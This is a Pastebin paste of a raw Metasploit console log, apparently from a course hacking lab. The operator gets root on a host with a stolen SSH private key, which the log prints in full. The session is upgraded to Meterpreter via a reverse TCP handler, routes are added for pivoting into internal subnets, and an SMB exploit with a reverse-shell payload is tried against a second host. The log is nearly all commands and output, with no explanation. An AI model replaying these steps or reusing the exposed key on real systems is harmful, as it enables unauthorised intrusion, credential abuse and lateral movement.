Advertisement
Guest User

Untitled

a guest
Oct 8th, 2019
5,531
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 21.12 KB | None | 0 0
  1. msf5 exploit(cgi/webapps/42084) > use auxiliary/scanner/ssh/ssh_login_pubkey
  2. msf5 auxiliary(scanner/ssh/ssh_login_pubkey) > options
  3.  
  4. Module options (auxiliary/scanner/ssh/ssh_login_pubkey):
  5.  
  6. Name Current Setting Required Description
  7. ---- --------------- -------- -----------
  8. BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
  9. DB_ALL_CREDS false no Try each user/password couple stored in the current database
  10. DB_ALL_PASS false no Add all passwords in the current database to the list
  11. DB_ALL_USERS false no Add all users in the current database to the list
  12. KEY_PASS no Passphrase for SSH private key(s)
  13. KEY_PATH yes Filename or directory of cleartext private keys. Filenames beginning with a dot, or ending in ".pub" will be skipped.
  14. RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  15. RPORT 22 yes The target port
  16. STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
  17. THREADS 1 yes The number of concurrent threads
  18. USERNAME no A specific username to authenticate as
  19. USER_FILE no File containing usernames, one per line
  20. VERBOSE true yes Whether to print output for all attempts
  21.  
  22. msf5 auxiliary(scanner/ssh/ssh_login_pubkey) > set key_path /root/Documents/gibsonhack/ssh/buckeye/id_rsa.txt
  23. key_path => /root/Documents/gibsonhack/ssh/buckeye/id_rsa.txt
  24. msf5 auxiliary(scanner/ssh/ssh_login_pubkey) > set username root
  25. username => root
  26. smsf5 auxiliary(scanner/ssh/ssh_login_pubkey) > set rhosts 10.0.6.233
  27. rhosts => 10.0.6.233
  28. msf5 auxiliary(scanner/ssh/ssh_login_pubkey) > run
  29.  
  30. [*] 10.0.6.233:22 SSH - Testing Cleartext Keys
  31. [*] 10.0.6.233:22 - Testing 1 keys from /root/Documents/gibsonhack/ssh/buckeye/id_rsa.txt
  32. [-] Could not connect: The connection timed out (10.0.6.233:22).
  33. [*] Scanned 1 of 1 hosts (100% complete)
  34. [*] Auxiliary module execution completed
  35. msf5 auxiliary(scanner/ssh/ssh_login_pubkey) > options
  36.  
  37. Module options (auxiliary/scanner/ssh/ssh_login_pubkey):
  38.  
  39. Name Current Setting Required Description
  40. ---- --------------- -------- -----------
  41. BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
  42. DB_ALL_CREDS false no Try each user/password couple stored in the current database
  43. DB_ALL_PASS false no Add all passwords in the current database to the list
  44. DB_ALL_USERS false no Add all users in the current database to the list
  45. KEY_PASS no Passphrase for SSH private key(s)
  46. KEY_PATH /root/Documents/gibsonhack/ssh/buckeye/id_rsa.txt yes Filename or directory of cleartext private keys. Filenames beginning with a dot, or ending in ".pub" will be skipped.
  47. RHOSTS 10.0.6.233 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  48. RPORT 22 yes The target port
  49. STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
  50. THREADS 1 yes The number of concurrent threads
  51. USERNAME root no A specific username to authenticate as
  52. USER_FILE no File containing usernames, one per line
  53. VERBOSE true yes Whether to print output for all attempts
  54.  
  55. msf5 auxiliary(scanner/ssh/ssh_login_pubkey) > set rport 52961
  56. rport => 52961
  57. rmsf5 auxiliary(scanner/ssh/ssh_login_pubkey) > run
  58.  
  59. [*] 10.0.6.233:52961 SSH - Testing Cleartext Keys
  60. [*] 10.0.6.233:52961 - Testing 1 keys from /root/Documents/gibsonhack/ssh/buckeye/id_rsa.txt
  61. [+] 10.0.6.233:52961 - Success: 'root:-----BEGIN RSA PRIVATE KEY-----
  62. MIIEpAIBAAKCAQEAz1xc/jRqeDJ6lbVZ3DV5UJfYdngHenhZHP6hiMzQ1VgrGJZp
  63. c2pdzRMMWXiCpv5viXZjheztaTm684YnYM+0T47MCuFXVkD++TmZojdwehmFUsN4
  64. JDRlYjwLmIo/1LSXQZZXt7b0pXCFgFbxCAVsWGQnVIAzXkud+J1VNteKdDOTzycy
  65. KPQ7OKuqsoBNYiFWB/SYnyH/osSXec6NclrxL7RU408i60t7IgvUtyZgdqxp8zmY
  66. TyLjUz1aCMvgH5wrC2CPWphvQD2FXSkF6CYu2JSQ9vMRVD4QW+XZpY4mk1Jpg16M
  67. DtIoJ1J5LuNHitOrGh3fwYS1lCYsTlLWGL0eRQIDAQABAoIBAF2q90bNHpsVElK2
  68. DNVwQlCphtpc9ePYoUh7rTRCcMMuhKkiqJe+IIkWZam0yi/tFy0dEW/ZypSRw2Vl
  69. 4DvXFzgo5Pq1N+J6kbK61i90o5ZEGPl92rNgB7wMK6DIMnU+7mRuKUmPl4tz/Jow
  70. q8hXys1S0IFXN90Mg1telrOjQaOjKJZZTFB/vD1h/4JVdK2PEKDSLaHApgj+c2YR
  71. 6ocXexzZDB8DMogGtSm5hR/ODaOBuR9fZla89ukwXntLu0C+wSb7uBMVSVtH1Luk
  72. 0nNJEpgggeOJfe9R5z10OB1+vKgSR0WuLGLdGyrYovSP3jq24ijt8B3xpD++0jy/
  73. QVuZpoECgYEA4NV1Jwrh3yjPUbz+4pzN1OH2LbilAG02GTRKsRYDFvYY97dJh8hy
  74. 1LUPzzerijGzWhhxY95jcdXyp0OIUuxALbhY1PrtUq3qZGrsJ840es2zvI5TAfWn
  75. M1LPthtg7yFVt08reaKddOCirqAwLG769z3Sk1y9/zt53IQheVesp3kCgYEA7BrZ
  76. 1Vlkm6nEOwktyYVn/1VblOSiofDJo3xdAtm/tPgF5Hy54BSefoFVsEHHTYWggZyE
  77. A2hzx+k39BRIX0LWmCsbG0U63Q9A1JxfRDW5Vw3uD2sws82OH+dDIHJI8GhqNqYp
  78. KU/u2H7LES3/E2hQr/zyOGbWHtSd57Zk/KN/ni0CgYBpikoQJb+ZreKEEB/l6I2G
  79. nPuewspRxPJcKnvVXOveX2+g+Nz/bEzbJJNjRlKz8FistkSkCMTNrwzVD5Jyuov1
  80. 6k9oytGUuicJNFfe56Ei9GSm4nh8tv/hy8HNTlTWa+N8xSE3W+pl7vzu1CtI8F/G
  81. p7Ktkh9uLFEr/qpn94wIoQKBgQCbLeKySPjJHsFsk9HWO6potW9l4wfJK/s7SofP
  82. UdKgXMtyq093qdWqC9OH7xPRLdyak4ZovwQqBmzSLWqLweBNTzeXqt7PYDEaDFTI
  83. /g582xj2ZVszMg0RhuwlrTenWtlEZd1z26d9/4f0GKkn1k4B/VwuGdjtlozaOJUT
  84. P1qnWQKBgQDJYI3Xw70nXMCehrg5BEWm9pzXR5RqEJcJ2oLwfgokm9iMqWDO2BkZ
  85. Od7/OjbSZSUQoM5RRSQLjnhGVpvqwbjqu3Q/XV0P1kqEx51tISpJ+y5vdK6LE6y3
  86. pbMphePkSyy2CQ0U3x8NHIQXXRWXaJ4UBPlZiTQOQzv6s/7e2tBwuQ==
  87. -----END RSA PRIVATE KEY-----
  88. ' ''
  89. [*] Command shell session 1 opened (192.168.0.6:38981 -> 10.0.6.233:52961) at 2019-10-08 19:51:48 +0200
  90. [*] Scanned 1 of 1 hosts (100% complete)
  91. [*] Auxiliary module execution completed
  92. msf5 auxiliary(scanner/ssh/ssh_login_pubkey) > sessions -u 1
  93. [*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]
  94.  
  95. [!] SESSION may not be compatible with this module.
  96. [*] Upgrading session ID: 1
  97. [*] Starting exploit/multi/handler
  98. [*] Started reverse TCP handler on 192.168.0.6:4433
  99. [*] Sending stage (985320 bytes) to 10.0.6.233
  100. [*] Meterpreter session 2 opened (192.168.0.6:4433 -> 10.0.6.233:58620) at 2019-10-08 19:51:55 +0200
  101. [*] Sending stage (985320 bytes) to 10.0.6.233
  102. [*] Meterpreter session 3 opened (192.168.0.6:4433 -> 10.0.6.233:58622) at 2019-10-08 19:51:56 +0200
  103. [*] Sending stage (985320 bytes) to 10.0.6.233
  104. [*] Meterpreter session 4 opened (192.168.0.6:4433 -> 10.0.6.233:58624) at 2019-10-08 19:51:57 +0200
  105. [*] Sending stage (985320 bytes) to 10.0.6.233
  106. [*] Meterpreter session 5 opened (192.168.0.6:4433 -> 10.0.6.233:58638) at 2019-10-08 19:52:01 +0200
  107. [*] Command stager progress: 100.00% (773/773 bytes)
  108. msf5 auxiliary(scanner/ssh/ssh_login_pubkey) >
  109. [*] Stopping exploit/multi/handler
  110. sessions
  111.  
  112. Active sessions
  113. ===============
  114.  
  115. Id Name Type Information Connection
  116. -- ---- ---- ----------- ----------
  117. 1 shell unknown SSH root:d0:58:30:8f:7c:82:17:ed:4d:6c:85:cc:10:33:4a:09 (10.0.6.233:52961) 192.168.0.6:38981 -> 10.0.6.233:52961 (10.0.6.233)
  118. 2 meterpreter x86/linux 192.168.0.6:4433 -> 10.0.6.233:58620 (10.0.6.233)
  119. 3 meterpreter x86/linux 192.168.0.6:4433 -> 10.0.6.233:58622 (10.0.6.233)
  120. 4 meterpreter x86/linux 192.168.0.6:4433 -> 10.0.6.233:58624 (10.0.6.233)
  121. 5 meterpreter x86/linux uid=0, gid=0, euid=0, egid=0 @ en2720-w3-buckeye.c.en2720-2017.internal 192.168.0.6:4433 -> 10.0.6.233:58638 (10.0.6.233)
  122.  
  123. msf5 auxiliary(scanner/ssh/ssh_login_pubkey) > sessions 5
  124. [*] Starting interaction with 5...
  125.  
  126. meterpreter > autoroute -h
  127. [-] Unknown command: autoroute.
  128. meterpreter > run autoroute -h
  129.  
  130. [!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
  131. [!] Example: run post/multi/manage/autoroute OPTION=value [...]
  132. [*] Usage: run autoroute [-r] -s subnet -n netmask
  133. [*] Examples:
  134. [*] run autoroute -s 10.1.1.0 -n 255.255.255.0 # Add a route to 10.10.10.1/255.255.255.0
  135. [*] run autoroute -s 10.10.10.1 # Netmask defaults to 255.255.255.0
  136. [*] run autoroute -s 10.10.10.1/24 # CIDR notation is also okay
  137. [*] run autoroute -p # Print active routing table
  138. [*] run autoroute -d -s 10.10.10.1 # Deletes the 10.10.10.1/255.255.255.0 route
  139. [*] Use the "route" and "ipconfig" Meterpreter commands to learn about available routes
  140. [-] Deprecation warning: This script has been replaced by the post/multi/manage/autoroute module
  141. meterpreter > run post/multi/manage/autoroute
  142.  
  143. [!] SESSION may not be compatible with this module.
  144. [*] Running module against en2720-w3-buckeye.c.en2720-2017.internal
  145. [*] Searching for subnets to autoroute.
  146. [+] Route added to subnet 10.0.0.0/255.255.252.0 from host's routing table.
  147. [+] Route added to subnet 10.0.4.0/255.255.252.0 from host's routing table.
  148. [+] Route added to subnet 10.15.212.0/255.255.252.0 from host's routing table.
  149. [+] Route added to subnet 192.168.0.0/255.255.255.0 from host's routing table.
  150. meterpreter > background
  151. [*] Backgrounding session 5...
  152. msf5 auxiliary(scanner/ssh/ssh_login_pubkey) > use exploit/cgi/webapps/42084
  153. msf5 exploit(cgi/webapps/42084) > options
  154.  
  155. Module options (exploit/cgi/webapps/42084):
  156.  
  157. Name Current Setting Required Description
  158. ---- --------------- -------- -----------
  159. RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  160. RPORT 445 yes The SMB service port (TCP)
  161. SMB_FOLDER no The directory to use within the writeable SMB share
  162. SMB_SHARE_BASE no The remote filesystem path correlating with the SMB share name
  163. SMB_SHARE_NAME no The name of the SMB share containing a writeable directory
  164.  
  165.  
  166. Exploit target:
  167.  
  168. Id Name
  169. -- ----
  170. 1 Linux x86_64
  171.  
  172.  
  173. msf5 exploit(cgi/webapps/42084) > [*] 10.0.6.233 - Meterpreter session 2 closed. Reason: Died
  174. [*] 10.0.6.233 - Meterpreter session 3 closed. Reason: Died
  175. [*] 10.0.6.233 - Meterpreter session 4 closed. Reason: Died
  176. options
  177.  
  178. Module options (exploit/cgi/webapps/42084):
  179.  
  180. Name Current Setting Required Description
  181. ---- --------------- -------- -----------
  182. RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  183. RPORT 445 yes The SMB service port (TCP)
  184. SMB_FOLDER no The directory to use within the writeable SMB share
  185. SMB_SHARE_BASE no The remote filesystem path correlating with the SMB share name
  186. SMB_SHARE_NAME no The name of the SMB share containing a writeable directory
  187.  
  188.  
  189. Exploit target:
  190.  
  191. Id Name
  192. -- ----
  193. 1 Linux x86_64
  194.  
  195.  
  196. msf5 exploit(cgi/webapps/42084) > set rhosts 10.0.6.233
  197. rhosts => 10�.0.6.233
  198. msf5 exploit(cgi/webapps/42084) > set rhosts 10.0.6.239
  199. rhosts => 10.0.6.239
  200. semsf5 exploit(cgi/webapps/42084) > run
  201.  
  202. [-] 10.0.6.239:445 - Exploit failed: invalid address
  203. [*] Exploit completed, but no session was created.
  204. msf5 exploit(cgi/webapps/42084) > use post/multi/manage/autoroute
  205. msf5 post(multi/manage/autoroute) > options
  206.  
  207. Module options (post/multi/manage/autoroute):
  208.  
  209. Name Current Setting Required Description
  210. ---- --------------- -------- -----------
  211. CMD autoadd yes Specify the autoroute command (Accepted: add, autoadd, print, delete, default)
  212. NETMASK 255.255.255.0 no Netmask (IPv4 as "255.255.255.0" or CIDR as "/24"
  213. SESSION yes The session to run this module on.
  214. SUBNET no Subnet (IPv4, for example, 10.10.10.0)
  215.  
  216. msf5 post(multi/manage/autoroute) > sessions
  217.  
  218. Active sessions
  219. ===============
  220.  
  221. Id Name Type Information Connection
  222. -- ---- ---- ----------- ----------
  223. 1 shell unknown SSH root:d0:58:30:8f:7c:82:17:ed:4d:6c:85:cc:10:33:4a:09 (10.0.6.233:52961) 192.168.0.6:38981 -> 10.0.6.233:52961 (10.0.6.233)
  224. 5 meterpreter x86/linux uid=0, gid=0, euid=0, egid=0 @ en2720-w3-buckeye.c.en2720-2017.internal 192.168.0.6:4433 -> 10.0.6.233:58638 (10.0.6.233)
  225.  
  226. msf5 post(multi/manage/autoroute) > set session 5
  227. session => 5
  228. msf5 post(multi/manage/autoroute) > options
  229.  
  230. Module options (post/multi/manage/autoroute):
  231.  
  232. Name Current Setting Required Description
  233. ---- --------------- -------- -----------
  234. CMD autoadd yes Specify the autoroute command (Accepted: add, autoadd, print, delete, default)
  235. NETMASK 255.255.255.0 no Netmask (IPv4 as "255.255.255.0" or CIDR as "/24"
  236. SESSION 5 yes The session to run this module on.
  237. SUBNET no Subnet (IPv4, for example, 10.10.10.0)
  238.  
  239. msf5 post(multi/manage/autoroute) > run
  240.  
  241. [!] SESSION may not be compatible with this module.
  242. [*] Running module against en2720-w3-buckeye.c.en2720-2017.internal
  243. [*] Searching for subnets to autoroute.
  244. [*] Did not find any new subnets to add.
  245. [*] Post module execution completed
  246. msf5 post(multi/manage/autoroute) > sessions -5
  247. [-] Invalid session identifier: -5
  248. msf5 post(multi/manage/autoroute) > sessions 5
  249. [*] Starting interaction with 5...
  250.  
  251. meterpreter > run autoroute -h
  252.  
  253. [!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
  254. [!] Example: run post/multi/manage/autoroute OPTION=value [...]
  255. [*] Usage: run autoroute [-r] -s subnet -n netmask
  256. [*] Examples:
  257. [*] run autoroute -s 10.1.1.0 -n 255.255.255.0 # Add a route to 10.10.10.1/255.255.255.0
  258. [*] run autoroute -s 10.10.10.1 # Netmask defaults to 255.255.255.0
  259. [*] run autoroute -s 10.10.10.1/24 # CIDR notation is also okay
  260. [*] run autoroute -p # Print active routing table
  261. [*] run autoroute -d -s 10.10.10.1 # Deletes the 10.10.10.1/255.255.255.0 route
  262. [*] Use the "route" and "ipconfig" Meterpreter commands to learn about available routes
  263. [-] Deprecation warning: This script has been replaced by the post/multi/manage/autoroute module
  264. meterpreter > run autoroute -D
  265.  
  266. [!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
  267. [!] Example: run post/multi/manage/autoroute OPTION=value [...]
  268. [*] Deleted all routes
  269. meterpreter > run autoroute -p
  270.  
  271. [!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
  272. [!] Example: run post/multi/manage/autoroute OPTION=value [...]
  273. [*] No routes have been added yet
  274. meterpreter > background
  275. [*] Backgrounding session 5...
  276. msf5 post(multi/manage/autoroute) > run
  277.  
  278. [!] SESSION may not be compatible with this module.
  279. [*] Running module against en2720-w3-buckeye.c.en2720-2017.internal
  280. [*] Searching for subnets to autoroute.
  281. [+] Route added to subnet 10.0.0.0/255.255.252.0 from host's routing table.
  282. [+] Route added to subnet 10.0.4.0/255.255.252.0 from host's routing table.
  283. [+] Route added to subnet 10.15.212.0/255.255.252.0 from host's routing table.
  284. [+] Route added to subnet 192.168.0.0/255.255.255.0 from host's routing table.
  285. [*] Post module execution completed
  286. msf5 post(multi/manage/autoroute) > use exploit/cgi/webapps/42084
  287. msf5 exploit(cgi/webapps/42084) > options
  288.  
  289. Module options (exploit/cgi/webapps/42084):
  290.  
  291. Name Current Setting Required Description
  292. ---- --------------- -------- -----------
  293. RHOSTS 10.0.6.239 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  294. RPORT 445 yes The SMB service port (TCP)
  295. SMB_FOLDER no The directory to use within the writeable SMB share
  296. SMB_SHARE_BASE no The remote filesystem path correlating with the SMB share name
  297. SMB_SHARE_NAME no The name of the SMB share containing a writeable directory
  298.  
  299.  
  300. Payload options (generic/shell_reverse_tcp):
  301.  
  302. Name Current Setting Required Description
  303. ---- --------------- -------- -----------
  304. LHOST 192.168.0.6 yes The listen address (an interface may be specified)
  305. LPORT 4444 yes The listen port
  306.  
  307.  
  308. Exploit target:
  309.  
  310. Id Name
  311. -- ----
  312. 1 Linux x86_64
  313.  
  314.  
  315. msf5 exploit(cgi/webapps/42084) > run
  316.  
  317. [-] 10.0.6.239:445 - Exploit failed: invalid address
  318. [*] Exploit completed, but no session was created.
  319. msf5 exploit(cgi/webapps/42084) > set RHOSTS 10.0.6.239
  320. RHOSTS => 10.0.6.239
  321. msf5 exploit(cgi/webapps/42084) > run
  322.  
  323. [-] 10.0.6.239:445 - Exploit failed: invalid address
  324. [*] Exploit completed, but no session was created.
  325. msf5 exploit(cgi/webapps/42084) > show options
  326.  
  327. Module options (exploit/cgi/webapps/42084):
  328.  
  329. Name Current Setting Required Description
  330. ---- --------------- -------- -----------
  331. RHOSTS 10.0.6.239 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  332. RPORT 445 yes The SMB service port (TCP)
  333. SMB_FOLDER no The directory to use within the writeable SMB share
  334. SMB_SHARE_BASE no The remote filesystem path correlating with the SMB share name
  335. SMB_SHARE_NAME no The name of the SMB share containing a writeable directory
  336.  
  337.  
  338. Payload options (generic/shell_reverse_tcp):
  339.  
  340. Name Current Setting Required Description
  341. ---- --------------- -------- -----------
  342. LHOST 192.168.0.6 yes The listen address (an interface may be specified)
  343. LPORT 4444 yes The listen port
  344.  
  345.  
  346. Exploit target:
  347.  
  348. Id Name
  349. -- ----
  350. 1 Linux x86_64
  351.  
  352.  
  353. msf5 exploit(cgi/webapps/42084) > set payload ""
  354. [-] The value specified for payload is not valid.
  355. msf5 exploit(cgi/webapps/42084) > set payload
  356. payload => generic/shell_reverse_tcp
  357. msf5 exploit(cgi/webapps/42084) > show payloads
  358.  
  359. Compatible Payloads
  360. ===================
  361.  
  362. # Name Disclosure Date Rank Check Description
  363. - ---- --------------- ---- ----- -----------
  364. 0 generic/custom normal No Custom Payload
  365. 1 generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
  366. 2 generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
  367. 3 linux/x64/exec normal No Linux Execute Command
  368. 4 linux/x64/meterpreter/bind_tcp normal No Linux Mettle x64, Bind TCP Stager
  369. 5 linux/x64/meterpreter/reverse_tcp normal No Linux Mettle x64, Reverse TCP Stager
  370. 6 linux/x64/pingback_bind_tcp normal No Linux x64 Pingback, Bind TCP Inline
  371. 7 linux/x64/pingback_reverse_tcp normal No Linux x64 Pingback, Reverse TCP Inline
  372. 8 linux/x64/shell/bind_tcp normal No Linux Command Shell, Bind TCP Stager
  373. 9 linux/x64/shell/reverse_tcp normal No Linux Command Shell, Reverse TCP Stager
  374. 10 linux/x64/shell_bind_ipv6_tcp normal No Linux x64 Command Shell, Bind TCP Inline (IPv6)
  375. 11 linux/x64/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline
  376. 12 linux/x64/shell_bind_tcp_random_port normal No Linux Command Shell, Bind TCP Random Port Inline
  377. 13 linux/x64/shell_reverse_ipv6_tcp normal No Linux x64 Command Shell, Reverse TCP Inline (IPv6)
  378. 14 linux/x64/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement